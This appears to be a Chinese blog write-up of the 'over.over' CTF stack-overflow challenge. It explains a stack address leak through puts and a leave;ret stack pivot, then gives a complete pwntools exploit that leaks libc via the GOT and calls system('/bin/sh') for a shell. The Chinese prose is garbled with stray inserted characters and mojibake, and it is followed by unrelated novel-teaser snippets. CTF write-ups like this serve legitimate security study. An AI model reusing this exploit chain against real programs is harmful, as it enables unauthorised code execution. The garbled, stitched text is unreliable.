over.over

wiki花式棧溢出上的一道例題党觅，先checksec 一波

image.png

只開了個NX斋泄，再看一眼IDA

image.png

很明顯的棧溢出漏洞，但是并沒有那么簡單炫掐，因為你會發(fā)現(xiàn)這個溢出空間有點小了，只有0x10，但是我們看到后面有一個puts函數(shù)將我們輸入的內(nèi)容打印出來,read并不會在末尾補'\x00'所以只要我們輸入0x50個字節(jié)畦浓，puts就會把rbp也隨便打印出來，這樣我們就可以通過固定偏移知道棧上所有位置的地址了

image.png

leak 出棧上的地址后我們就可以通過控制rbp為棧上地址讶请，ret_addr 為leave地址來控制程序流程
exp:

#-*-coding:utf-8-*-
from pwn import *
p = process('./over.over')
elf = ELF('./over.over')
libc = elf.libc
context.log_level = 'debug'
payload_1 = 'a'*80
p.recvuntil('>')
p.send(payload_1)
a = p.recvuntil('\x7f')
print a
b = u64(a[-6:].ljust(8,'\x00'))
print hex(b)
stack = b-0x70
# success("stack -> {:#x}".format(stack))
# pause()
p.recvuntil('>')
puts_plt = elf.plt['puts']
print hex(puts_plt)
puts_got = elf.got['puts']
print hex(puts_got)
sub_400676 = 0x400676
leave_ret = 0x4006be
pop_rdi = 0x400793
payload_2 = ''
payload_2 += p64(0xdeadbeef)
payload_2 += p64(pop_rdi)
payload_2 += p64(puts_got)
payload_2 += p64(puts_plt)
payload_2 += p64(sub_400676)
payload_2 += (80-40)*'a'
payload_2 += p64(stack)
payload_2 += p64(leave_ret)
gdb.attach(p,"b *0x4006AD\nc")
pause()
p.send(payload_2)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print "puts_addr: " + hex(puts_addr)
puts_libc = libc.symbols['puts']
offset = puts_addr - puts_libc
binsh_libc = libc.search("/bin/sh").next()
system_libc = libc.symbols['system']
system_addr = offset + system_libc
print "system_addr: " + hex(system_addr)
binsh_addr = offset + binsh_libc
print "binsh_addr: " + hex(binsh_addr)
pause()
payload_3 = ''
payload_3 += p64(0xdeadbeef)
payload_3 += p64(pop_rdi)
payload_3 += p64(binsh_addr)
payload_3 += p64(system_addr)
payload_3 += (80-32)*'a'
payload_3 += p64(stack-0x30)
payload_3 += p64(leave_ret)
# gdb.attach(p,"b *0x4006b9\nc")
# pause()
p.send(payload_3)
p.interactive()

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末秽梅，一起剝皮案震驚了整個濱河市剿牺，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌晒来，老刑警劉巖钞诡，帶你破解...
沈念sama閱讀 219,188評論 6贊 508
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件荧降，死亡現(xiàn)場離奇詭異，居然都是意外死亡朵诫，警方通過查閱死者的電腦和手機，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 93,464評論 3贊 395
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進店門剪返，熙熙樓的掌柜王于貴愁眉苦臉地迎上來邓梅，“玉大人，你說我怎么就攤上這事日缨∏矗” “怎么了面哥？”我有些...
開封第一講書人閱讀 165,562評論 0贊 356
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長尚卫。經(jīng)常有香客問我，道長焕毫，這世上最難降的妖魔是什么蹲坷？我笑而不...
開封第一講書人閱讀 58,893評論 1贊 295
?港島之戀（遺憾婚禮）
正文為了忘掉前任循签，我火速辦了婚禮，結(jié)果婚禮上疙咸，老公的妹妹穿的比我還像新娘。我一直安慰自己撒轮，他們只是感情好，可當我...
茶點故事閱讀 67,917評論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布题山。她就那樣靜靜地躺著，像睡著了一般顶瞳。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上慨菱，一...
開封第一講書人閱讀 51,708評論 1贊 305
城市分裂傳說
那天，我揣著相機與錄音符喝，去河邊找鬼。笑死协饲，一個胖子當著我的面吹牛，可吹牛的內(nèi)容都是我干的囱稽。我是一名探鬼主播，決...
沈念sama閱讀 40,430評論 3贊 420
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼战惊，長吁一口氣：“原來是場噩夢啊……” “哼扎即！你這毒婦竟也來了？” 一聲冷哼從身側(cè)響起谚鄙，我...
開封第一講書人閱讀 39,342評論 0贊 276
萬榮殺人案實錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎闷营，沒想到半個月后知市，有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 45,801評論 1贊 317
?護林員之死
正文獨居荒郊野嶺守林人離奇死亡嫂丙，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點故事閱讀 37,976評論 3贊 337
?白月光啟示錄
正文我和宋清朗相戀三年规哲，在試婚紗的時候發(fā)現(xiàn)自己被綠了。大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片唉锌。...
茶點故事閱讀 40,115評論 1贊 351
活死人
序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖袄简，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情绿语，我是刑警寧澤秃症，帶...
沈念sama閱讀 35,804評論 5贊 346
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布伍纫，位于F島的核電站，受9級特大地震影響昂芜，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜泌神，卻給世界環(huán)境...
茶點故事閱讀 41,458評論 3贊 331
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望欢际。院中可真熱鬧，春花似錦损趋、人聲如沸患久。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,008評論 0贊 22
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽桐玻。三九已至，卻和暖如春镊靴，著一層夾襖步出監(jiān)牢的瞬間链韭，已是汗流浹背。一陣腳步聲響...
開封第一講書人閱讀 33,135評論 1贊 272
情欲美人皮
我被黑心中介騙來泰國打工敞峭，沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留，地道東北人州邢。一個月前我還...
沈念sama閱讀 48,365評論 3贊 373
代替公主和親
正文我出身青樓，卻偏偏與公主長得像骗村，于是被迫代替她去往敵國和親。傳聞我的和親對象是個殘疾皇子呀枢，可洞房花燭夜當晚...
茶點故事閱讀 45,055評論 2贊 355

over.over

推薦閱讀更多精彩內(nèi)容